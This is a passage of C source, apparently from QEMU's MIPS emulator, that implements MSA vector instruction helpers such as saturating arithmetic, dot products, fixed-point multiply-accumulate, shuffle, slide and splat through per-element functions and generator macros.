pwd->b[0] = msa_srlr_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_srlr_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_srlr_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_srlr_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_srlr_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_srlr_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_srlr_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_srlr_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_srlr_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_srlr_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_srlr_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_srlr_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_srlr_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_srlr_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_srlr_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_srlr_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_srlr_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_srlr_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_srlr_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_srlr_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_srlr_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_srlr_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_srlr_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_srlr_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_srlr_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_srlr_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_srlr_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_srlr_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_srlr_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_srlr_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_srlr_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_srlr_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_srlr_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } #define MSA_FN_IMM8(FUNC, DEST, OPERATION) \ void helper_msa_ ## FUNC(CPUMIPSState *env, uint32_t wd, uint32_t ws, \ uint32_t i8) \ { \ wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ uint32_t i; \ for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ DEST = OPERATION; \ } \ } MSA_FN_IMM8(andi_b, 
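/*
 * MSA_FN_IMM8 above stamps out the byte-wise immediate-operand helpers;
 * the andi_b instantiation that follows expands to (roughly):
 *
 *   void helper_msa_andi_b(CPUMIPSState *env, uint32_t wd, uint32_t ws,
 *                          uint32_t i8)
 *   {
 *       wr_t *pwd = &(env->active_fpu.fpr[wd].wr);
 *       wr_t *pws = &(env->active_fpu.fpr[ws].wr);
 *       uint32_t i;
 *       for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) {
 *           pwd->b[i] = pws->b[i] & i8;
 *       }
 *   }
 */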
pwd->b[i], pws->b[i] & i8) MSA_FN_IMM8(ori_b, pwd->b[i], pws->b[i] | i8) MSA_FN_IMM8(nori_b, pwd->b[i], ~(pws->b[i] | i8)) MSA_FN_IMM8(xori_b, pwd->b[i], pws->b[i] ^ i8) #define BIT_MOVE_IF_NOT_ZERO(dest, arg1, arg2, df) \ UNSIGNED(((dest & (~arg2)) | (arg1 & arg2)), df) MSA_FN_IMM8(bmnzi_b, pwd->b[i], BIT_MOVE_IF_NOT_ZERO(pwd->b[i], pws->b[i], i8, DF_BYTE)) #define BIT_MOVE_IF_ZERO(dest, arg1, arg2, df) \ UNSIGNED((dest & arg2) | (arg1 & (~arg2)), df) MSA_FN_IMM8(bmzi_b, pwd->b[i], BIT_MOVE_IF_ZERO(pwd->b[i], pws->b[i], i8, DF_BYTE)) #define BIT_SELECT(dest, arg1, arg2, df) \ UNSIGNED((arg1 & (~dest)) | (arg2 & dest), df) MSA_FN_IMM8(bseli_b, pwd->b[i], BIT_SELECT(pwd->b[i], pws->b[i], i8, DF_BYTE)) #undef BIT_SELECT #undef BIT_MOVE_IF_ZERO #undef BIT_MOVE_IF_NOT_ZERO #undef MSA_FN_IMM8 #define SHF_POS(i, imm) (((i) & 0xfc) + (((imm) >> (2 * ((i) & 0x03))) & 0x03)) void helper_msa_shf_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t imm) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t wx, *pwx = &wx; uint32_t i; switch (df) { case DF_BYTE: for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { pwx->b[i] = pws->b[SHF_POS(i, imm)]; } break; case DF_HALF: for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { pwx->h[i] = pws->h[SHF_POS(i, imm)]; } break; case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { pwx->w[i] = pws->w[SHF_POS(i, imm)]; } break; default: assert(0); } msa_move_v(pwd, pwx); } static inline int64_t msa_subv_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 - arg2; } #define MSA_BINOP_IMM_DF(helper, func) \ void helper_msa_ ## helper ## _df(CPUMIPSState *env, uint32_t df, \ uint32_t wd, uint32_t ws, int32_t u5) \ { \ wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ uint32_t i; \ \ switch (df) { \ case DF_BYTE: \ for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ pwd->b[i] = msa_ ## func ## _df(df, pws->b[i], u5); \ } \ break; \ case DF_HALF: \ for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ pwd->h[i] = msa_ ## func ## _df(df, pws->h[i], u5); \ } \ break; \ case DF_WORD: \ for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ pwd->w[i] = msa_ ## func ## _df(df, pws->w[i], u5); \ } \ break; \ case DF_DOUBLE: \ for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ pwd->d[i] = msa_ ## func ## _df(df, pws->d[i], u5); \ } \ break; \ default: \ assert(0); \ } \ } MSA_BINOP_IMM_DF(addvi, addv) MSA_BINOP_IMM_DF(subvi, subv) MSA_BINOP_IMM_DF(ceqi, ceq) MSA_BINOP_IMM_DF(clei_s, cle_s) MSA_BINOP_IMM_DF(clei_u, cle_u) MSA_BINOP_IMM_DF(clti_s, clt_s) MSA_BINOP_IMM_DF(clti_u, clt_u) MSA_BINOP_IMM_DF(maxi_s, max_s) MSA_BINOP_IMM_DF(maxi_u, max_u) MSA_BINOP_IMM_DF(mini_s, min_s) MSA_BINOP_IMM_DF(mini_u, min_u) #undef MSA_BINOP_IMM_DF void helper_msa_ldi_df(CPUMIPSState *env, uint32_t df, uint32_t wd, int32_t s10) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); uint32_t i; switch (df) { case DF_BYTE: for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { pwd->b[i] = (int8_t)s10; } break; case DF_HALF: for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { pwd->h[i] = (int16_t)s10; } break; case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { pwd->w[i] = (int32_t)s10; } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { pwd->d[i] = (int64_t)s10; } break; default: assert(0); } } static inline int64_t msa_sat_s_df(uint32_t df, int64_t arg, uint32_t m) { return arg < M_MIN_INT(m + 1) ? M_MIN_INT(m + 1) : arg > M_MAX_INT(m + 1) ? 
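/*
 * Saturation clamps to an (m + 1)-bit range, with M_MAX_INT/M_MIN_INT
 * assumed to follow their earlier definitions in this file: for SAT_S
 * with m = 7 the result is clamped to [-128, 127], so sat_s(300, 7)
 * yields 127 and sat_s(-300, 7) yields -128.
 */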
M_MAX_INT(m + 1) : arg; } static inline int64_t msa_sat_u_df(uint32_t df, int64_t arg, uint32_t m) { uint64_t u_arg = UNSIGNED(arg, df); return u_arg < M_MAX_UINT(m + 1) ? u_arg : M_MAX_UINT(m + 1); } #define MSA_BINOP_IMMU_DF(helper, func) \ void helper_msa_ ## helper ## _df(CPUMIPSState *env, uint32_t df, uint32_t wd, \ uint32_t ws, uint32_t u5) \ { \ wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ uint32_t i; \ \ switch (df) { \ case DF_BYTE: \ for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ pwd->b[i] = msa_ ## func ## _df(df, pws->b[i], u5); \ } \ break; \ case DF_HALF: \ for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ pwd->h[i] = msa_ ## func ## _df(df, pws->h[i], u5); \ } \ break; \ case DF_WORD: \ for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ pwd->w[i] = msa_ ## func ## _df(df, pws->w[i], u5); \ } \ break; \ case DF_DOUBLE: \ for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ pwd->d[i] = msa_ ## func ## _df(df, pws->d[i], u5); \ } \ break; \ default: \ assert(0); \ } \ } MSA_BINOP_IMMU_DF(slli, sll) MSA_BINOP_IMMU_DF(srai, sra) MSA_BINOP_IMMU_DF(srli, srl) MSA_BINOP_IMMU_DF(bclri, bclr) MSA_BINOP_IMMU_DF(bseti, bset) MSA_BINOP_IMMU_DF(bnegi, bneg) MSA_BINOP_IMMU_DF(sat_s, sat_s) MSA_BINOP_IMMU_DF(sat_u, sat_u) MSA_BINOP_IMMU_DF(srari, srar) MSA_BINOP_IMMU_DF(srlri, srlr) #undef MSA_BINOP_IMMU_DF #define MSA_TEROP_IMMU_DF(helper, func) \ void helper_msa_ ## helper ## _df(CPUMIPSState *env, uint32_t df, \ uint32_t wd, uint32_t ws, uint32_t u5) \ { \ wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ uint32_t i; \ \ switch (df) { \ case DF_BYTE: \ for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ pwd->b[i] = msa_ ## func ## _df(df, pwd->b[i], pws->b[i], \ u5); \ } \ break; \ case DF_HALF: \ for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ pwd->h[i] = msa_ ## func ## _df(df, pwd->h[i], pws->h[i], \ u5); \ } \ break; \ case DF_WORD: \ for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ pwd->w[i] = msa_ ## func ## _df(df, pwd->w[i], pws->w[i], \ u5); \ } \ break; \ case DF_DOUBLE: \ for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ pwd->d[i] = msa_ ## func ## _df(df, pwd->d[i], pws->d[i], \ u5); \ } \ break; \ default: \ assert(0); \ } \ } MSA_TEROP_IMMU_DF(binsli, binsl) MSA_TEROP_IMMU_DF(binsri, binsr) #undef MSA_TEROP_IMMU_DF static inline int64_t msa_subs_s_df(uint32_t df, int64_t arg1, int64_t arg2) { int64_t max_int = DF_MAX_INT(df); int64_t min_int = DF_MIN_INT(df); if (arg2 > 0) { return (min_int + arg2 < arg1) ? arg1 - arg2 : min_int; } else { return (arg1 < max_int + arg2) ? arg1 - arg2 : max_int; } } static inline int64_t msa_subs_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return (u_arg1 > u_arg2) ? u_arg1 - u_arg2 : 0; } static inline int64_t msa_subsus_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t max_uint = DF_MAX_UINT(df); if (arg2 >= 0) { uint64_t u_arg2 = (uint64_t)arg2; return (u_arg1 > u_arg2) ? (int64_t)(u_arg1 - u_arg2) : 0; } else { uint64_t u_arg2 = (uint64_t)(-arg2); return (u_arg1 < max_uint - u_arg2) ? (int64_t)(u_arg1 + u_arg2) : (int64_t)max_uint; } } static inline int64_t msa_subsuu_s_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); int64_t max_int = DF_MAX_INT(df); int64_t min_int = DF_MIN_INT(df); if (u_arg1 > u_arg2) { return u_arg1 - u_arg2 < (uint64_t)max_int ? 
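/* SUBSUU_S.df: the unsigned difference saturates into the signed range */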
(int64_t)(u_arg1 - u_arg2) : max_int; } else { return u_arg2 - u_arg1 < (uint64_t)(-min_int) ? (int64_t)(u_arg1 - u_arg2) : min_int; } } static inline int64_t msa_mulv_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 * arg2; } #define SIGNED_EXTRACT(e, o, a, df) \ do { \ e = SIGNED_EVEN(a, df); \ o = SIGNED_ODD(a, df); \ } while (0) #define UNSIGNED_EXTRACT(e, o, a, df) \ do { \ e = UNSIGNED_EVEN(a, df); \ o = UNSIGNED_ODD(a, df); \ } while (0) static inline int64_t msa_dotp_s_df(uint32_t df, int64_t arg1, int64_t arg2) { int64_t even_arg1; int64_t even_arg2; int64_t odd_arg1; int64_t odd_arg2; SIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); SIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); return (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); } static inline int64_t msa_dotp_u_df(uint32_t df, int64_t arg1, int64_t arg2) { int64_t even_arg1; int64_t even_arg2; int64_t odd_arg1; int64_t odd_arg2; UNSIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); UNSIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); return (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); } #define CONCATENATE_AND_SLIDE(s, k) \ do { \ for (i = 0; i < s; i++) { \ v[i] = pws->b[s * k + i]; \ v[i + s] = pwd->b[s * k + i]; \ } \ for (i = 0; i < s; i++) { \ pwd->b[s * k + i] = v[i + n]; \ } \ } while (0) static inline void msa_sld_df(uint32_t df, wr_t *pwd, wr_t *pws, target_ulong rt) { uint32_t n = rt % DF_ELEMENTS(df); uint8_t v[64]; uint32_t i, k; switch (df) { case DF_BYTE: CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_BYTE), 0); break; case DF_HALF: for (k = 0; k < 2; k++) { CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_HALF), k); } break; case DF_WORD: for (k = 0; k < 4; k++) { CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_WORD), k); } break; case DF_DOUBLE: for (k = 0; k < 8; k++) { CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_DOUBLE), k); } break; default: assert(0); } } static inline int64_t msa_mul_q_df(uint32_t df, int64_t arg1, int64_t arg2) { int64_t q_min = DF_MIN_INT(df); int64_t q_max = DF_MAX_INT(df); if (arg1 == q_min && arg2 == q_min) { return q_max; } return (arg1 * arg2) >> (DF_BITS(df) - 1); } static inline int64_t msa_mulr_q_df(uint32_t df, int64_t arg1, int64_t arg2) { int64_t q_min = DF_MIN_INT(df); int64_t q_max = DF_MAX_INT(df); int64_t r_bit = 1ULL << (DF_BITS(df) - 2); if (arg1 == q_min && arg2 == q_min) { return q_max; } return (arg1 * arg2 + r_bit) >> (DF_BITS(df) - 1); } #define MSA_BINOP_DF(func) \ void helper_msa_ ## func ## _df(CPUMIPSState *env, uint32_t df, \ uint32_t wd, uint32_t ws, uint32_t wt) \ { \ wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ \ switch (df) { \ case DF_BYTE: \ pwd->b[0] = msa_ ## func ## _df(df, pws->b[0], pwt->b[0]); \ pwd->b[1] = msa_ ## func ## _df(df, pws->b[1], pwt->b[1]); \ pwd->b[2] = msa_ ## func ## _df(df, pws->b[2], pwt->b[2]); \ pwd->b[3] = msa_ ## func ## _df(df, pws->b[3], pwt->b[3]); \ pwd->b[4] = msa_ ## func ## _df(df, pws->b[4], pwt->b[4]); \ pwd->b[5] = msa_ ## func ## _df(df, pws->b[5], pwt->b[5]); \ pwd->b[6] = msa_ ## func ## _df(df, pws->b[6], pwt->b[6]); \ pwd->b[7] = msa_ ## func ## _df(df, pws->b[7], pwt->b[7]); \ pwd->b[8] = msa_ ## func ## _df(df, pws->b[8], pwt->b[8]); \ pwd->b[9] = msa_ ## func ## _df(df, pws->b[9], pwt->b[9]); \ pwd->b[10] = msa_ ## func ## _df(df, pws->b[10], pwt->b[10]); \ pwd->b[11] = msa_ ## func ## _df(df, pws->b[11], pwt->b[11]); \ pwd->b[12] = msa_ ## func ## _df(df, pws->b[12], pwt->b[12]); \ pwd->b[13] = msa_ ## func ## _df(df, pws->b[13], pwt->b[13]); \ 
pwd->b[14] = msa_ ## func ## _df(df, pws->b[14], pwt->b[14]); \ pwd->b[15] = msa_ ## func ## _df(df, pws->b[15], pwt->b[15]); \ break; \ case DF_HALF: \ pwd->h[0] = msa_ ## func ## _df(df, pws->h[0], pwt->h[0]); \ pwd->h[1] = msa_ ## func ## _df(df, pws->h[1], pwt->h[1]); \ pwd->h[2] = msa_ ## func ## _df(df, pws->h[2], pwt->h[2]); \ pwd->h[3] = msa_ ## func ## _df(df, pws->h[3], pwt->h[3]); \ pwd->h[4] = msa_ ## func ## _df(df, pws->h[4], pwt->h[4]); \ pwd->h[5] = msa_ ## func ## _df(df, pws->h[5], pwt->h[5]); \ pwd->h[6] = msa_ ## func ## _df(df, pws->h[6], pwt->h[6]); \ pwd->h[7] = msa_ ## func ## _df(df, pws->h[7], pwt->h[7]); \ break; \ case DF_WORD: \ pwd->w[0] = msa_ ## func ## _df(df, pws->w[0], pwt->w[0]); \ pwd->w[1] = msa_ ## func ## _df(df, pws->w[1], pwt->w[1]); \ pwd->w[2] = msa_ ## func ## _df(df, pws->w[2], pwt->w[2]); \ pwd->w[3] = msa_ ## func ## _df(df, pws->w[3], pwt->w[3]); \ break; \ case DF_DOUBLE: \ pwd->d[0] = msa_ ## func ## _df(df, pws->d[0], pwt->d[0]); \ pwd->d[1] = msa_ ## func ## _df(df, pws->d[1], pwt->d[1]); \ break; \ default: \ assert(0); \ } \ } MSA_BINOP_DF(subv) MSA_BINOP_DF(subs_s) MSA_BINOP_DF(subs_u) MSA_BINOP_DF(subsus_u) MSA_BINOP_DF(subsuu_s) MSA_BINOP_DF(mulv) MSA_BINOP_DF(dotp_s) MSA_BINOP_DF(dotp_u) MSA_BINOP_DF(mul_q) MSA_BINOP_DF(mulr_q) #undef MSA_BINOP_DF void helper_msa_sld_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t rt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); msa_sld_df(df, pwd, pws, env->active_tc.gpr[rt]); } static inline int64_t msa_maddv_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { return dest + arg1 * arg2; } static inline int64_t msa_msubv_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { return dest - arg1 * arg2; } static inline int64_t msa_dpadd_s_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t even_arg1; int64_t even_arg2; int64_t odd_arg1; int64_t odd_arg2; SIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); SIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); return dest + (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); } static inline int64_t msa_dpadd_u_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t even_arg1; int64_t even_arg2; int64_t odd_arg1; int64_t odd_arg2; UNSIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); UNSIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); return dest + (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); } static inline int64_t msa_dpsub_s_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t even_arg1; int64_t even_arg2; int64_t odd_arg1; int64_t odd_arg2; SIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); SIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); return dest - ((even_arg1 * even_arg2) + (odd_arg1 * odd_arg2)); } static inline int64_t msa_dpsub_u_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t even_arg1; int64_t even_arg2; int64_t odd_arg1; int64_t odd_arg2; UNSIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); UNSIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); return dest - ((even_arg1 * even_arg2) + (odd_arg1 * odd_arg2)); } static inline int64_t msa_madd_q_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t q_prod, q_ret; int64_t q_max = DF_MAX_INT(df); int64_t q_min = DF_MIN_INT(df); q_prod = arg1 * arg2; q_ret = ((dest << (DF_BITS(df) - 1)) + q_prod) >> (DF_BITS(df) - 1); return (q_ret < q_min) ? q_min : (q_max < q_ret) ? 
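/* saturate the widened Q-format accumulator result */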
q_max : q_ret; } static inline int64_t msa_msub_q_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t q_prod, q_ret; int64_t q_max = DF_MAX_INT(df); int64_t q_min = DF_MIN_INT(df); q_prod = arg1 * arg2; q_ret = ((dest << (DF_BITS(df) - 1)) - q_prod) >> (DF_BITS(df) - 1); return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; } static inline int64_t msa_maddr_q_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t q_prod, q_ret; int64_t q_max = DF_MAX_INT(df); int64_t q_min = DF_MIN_INT(df); int64_t r_bit = 1ULL << (DF_BITS(df) - 2); q_prod = arg1 * arg2; q_ret = ((dest << (DF_BITS(df) - 1)) + q_prod + r_bit) >> (DF_BITS(df) - 1); return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; } static inline int64_t msa_msubr_q_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t q_prod, q_ret; int64_t q_max = DF_MAX_INT(df); int64_t q_min = DF_MIN_INT(df); int64_t r_bit = 1ULL << (DF_BITS(df) - 2); q_prod = arg1 * arg2; q_ret = ((dest << (DF_BITS(df) - 1)) - q_prod + r_bit) >> (DF_BITS(df) - 1); return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; } #define MSA_TEROP_DF(func) \ void helper_msa_ ## func ## _df(CPUMIPSState *env, uint32_t df, uint32_t wd, \ uint32_t ws, uint32_t wt) \ { \ wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ \ switch (df) { \ case DF_BYTE: \ pwd->b[0] = msa_ ## func ## _df(df, pwd->b[0], pws->b[0], \ pwt->b[0]); \ pwd->b[1] = msa_ ## func ## _df(df, pwd->b[1], pws->b[1], \ pwt->b[1]); \ pwd->b[2] = msa_ ## func ## _df(df, pwd->b[2], pws->b[2], \ pwt->b[2]); \ pwd->b[3] = msa_ ## func ## _df(df, pwd->b[3], pws->b[3], \ pwt->b[3]); \ pwd->b[4] = msa_ ## func ## _df(df, pwd->b[4], pws->b[4], \ pwt->b[4]); \ pwd->b[5] = msa_ ## func ## _df(df, pwd->b[5], pws->b[5], \ pwt->b[5]); \ pwd->b[6] = msa_ ## func ## _df(df, pwd->b[6], pws->b[6], \ pwt->b[6]); \ pwd->b[7] = msa_ ## func ## _df(df, pwd->b[7], pws->b[7], \ pwt->b[7]); \ pwd->b[8] = msa_ ## func ## _df(df, pwd->b[8], pws->b[8], \ pwt->b[8]); \ pwd->b[9] = msa_ ## func ## _df(df, pwd->b[9], pws->b[9], \ pwt->b[9]); \ pwd->b[10] = msa_ ## func ## _df(df, pwd->b[10], pws->b[10], \ pwt->b[10]); \ pwd->b[11] = msa_ ## func ## _df(df, pwd->b[11], pws->b[11], \ pwt->b[11]); \ pwd->b[12] = msa_ ## func ## _df(df, pwd->b[12], pws->b[12], \ pwt->b[12]); \ pwd->b[13] = msa_ ## func ## _df(df, pwd->b[13], pws->b[13], \ pwt->b[13]); \ pwd->b[14] = msa_ ## func ## _df(df, pwd->b[14], pws->b[14], \ pwt->b[14]); \ pwd->b[15] = msa_ ## func ## _df(df, pwd->b[15], pws->b[15], \ pwt->b[15]); \ break; \ case DF_HALF: \ pwd->h[0] = msa_ ## func ## _df(df, pwd->h[0], pws->h[0], pwt->h[0]); \ pwd->h[1] = msa_ ## func ## _df(df, pwd->h[1], pws->h[1], pwt->h[1]); \ pwd->h[2] = msa_ ## func ## _df(df, pwd->h[2], pws->h[2], pwt->h[2]); \ pwd->h[3] = msa_ ## func ## _df(df, pwd->h[3], pws->h[3], pwt->h[3]); \ pwd->h[4] = msa_ ## func ## _df(df, pwd->h[4], pws->h[4], pwt->h[4]); \ pwd->h[5] = msa_ ## func ## _df(df, pwd->h[5], pws->h[5], pwt->h[5]); \ pwd->h[6] = msa_ ## func ## _df(df, pwd->h[6], pws->h[6], pwt->h[6]); \ pwd->h[7] = msa_ ## func ## _df(df, pwd->h[7], pws->h[7], pwt->h[7]); \ break; \ case DF_WORD: \ pwd->w[0] = msa_ ## func ## _df(df, pwd->w[0], pws->w[0], pwt->w[0]); \ pwd->w[1] = msa_ ## func ## _df(df, pwd->w[1], pws->w[1], pwt->w[1]); \ pwd->w[2] = msa_ ## func ## _df(df, pwd->w[2], pws->w[2], pwt->w[2]); \ pwd->w[3] = msa_ ## func ## _df(df, pwd->w[3], pws->w[3], 
pwt->w[3]); \ break; \ case DF_DOUBLE: \ pwd->d[0] = msa_ ## func ## _df(df, pwd->d[0], pws->d[0], pwt->d[0]); \ pwd->d[1] = msa_ ## func ## _df(df, pwd->d[1], pws->d[1], pwt->d[1]); \ break; \ default: \ assert(0); \ } \ } MSA_TEROP_DF(maddv) MSA_TEROP_DF(msubv) MSA_TEROP_DF(dpadd_s) MSA_TEROP_DF(dpadd_u) MSA_TEROP_DF(dpsub_s) MSA_TEROP_DF(dpsub_u) MSA_TEROP_DF(binsl) MSA_TEROP_DF(binsr) MSA_TEROP_DF(madd_q) MSA_TEROP_DF(msub_q) MSA_TEROP_DF(maddr_q) MSA_TEROP_DF(msubr_q) #undef MSA_TEROP_DF static inline void msa_splat_df(uint32_t df, wr_t *pwd, wr_t *pws, target_ulong rt) { uint32_t n = rt % DF_ELEMENTS(df); uint32_t i; switch (df) { case DF_BYTE: for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { pwd->b[i] = pws->b[n]; } break; case DF_HALF: for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { pwd->h[i] = pws->h[n]; } break; case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { pwd->w[i] = pws->w[n]; } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { pwd->d[i] = pws->d[n]; } break; default: assert(0); } } void helper_msa_splat_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t rt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); msa_splat_df(df, pwd, pws, env->active_tc.gpr[rt]); } #define MSA_DO_B MSA_DO(b) #define MSA_DO_H MSA_DO(h) #define MSA_DO_W MSA_DO(w) #define MSA_DO_D MSA_DO(d) #define MSA_LOOP_B MSA_LOOP(B) #define MSA_LOOP_H MSA_LOOP(H) #define MSA_LOOP_W MSA_LOOP(W) #define MSA_LOOP_D MSA_LOOP(D) #define MSA_LOOP_COND_B MSA_LOOP_COND(DF_BYTE) #define MSA_LOOP_COND_H MSA_LOOP_COND(DF_HALF) #define MSA_LOOP_COND_W MSA_LOOP_COND(DF_WORD) #define MSA_LOOP_COND_D MSA_LOOP_COND(DF_DOUBLE) #define MSA_LOOP(DF) \ do { \ for (i = 0; i < (MSA_LOOP_COND_ ## DF) ; i++) { \ MSA_DO_ ## DF; \ } \ } while (0) #define MSA_FN_DF(FUNC) \ void helper_msa_##FUNC(CPUMIPSState *env, uint32_t df, uint32_t wd, \ uint32_t ws, uint32_t wt) \ { \ wr_t *pwd = 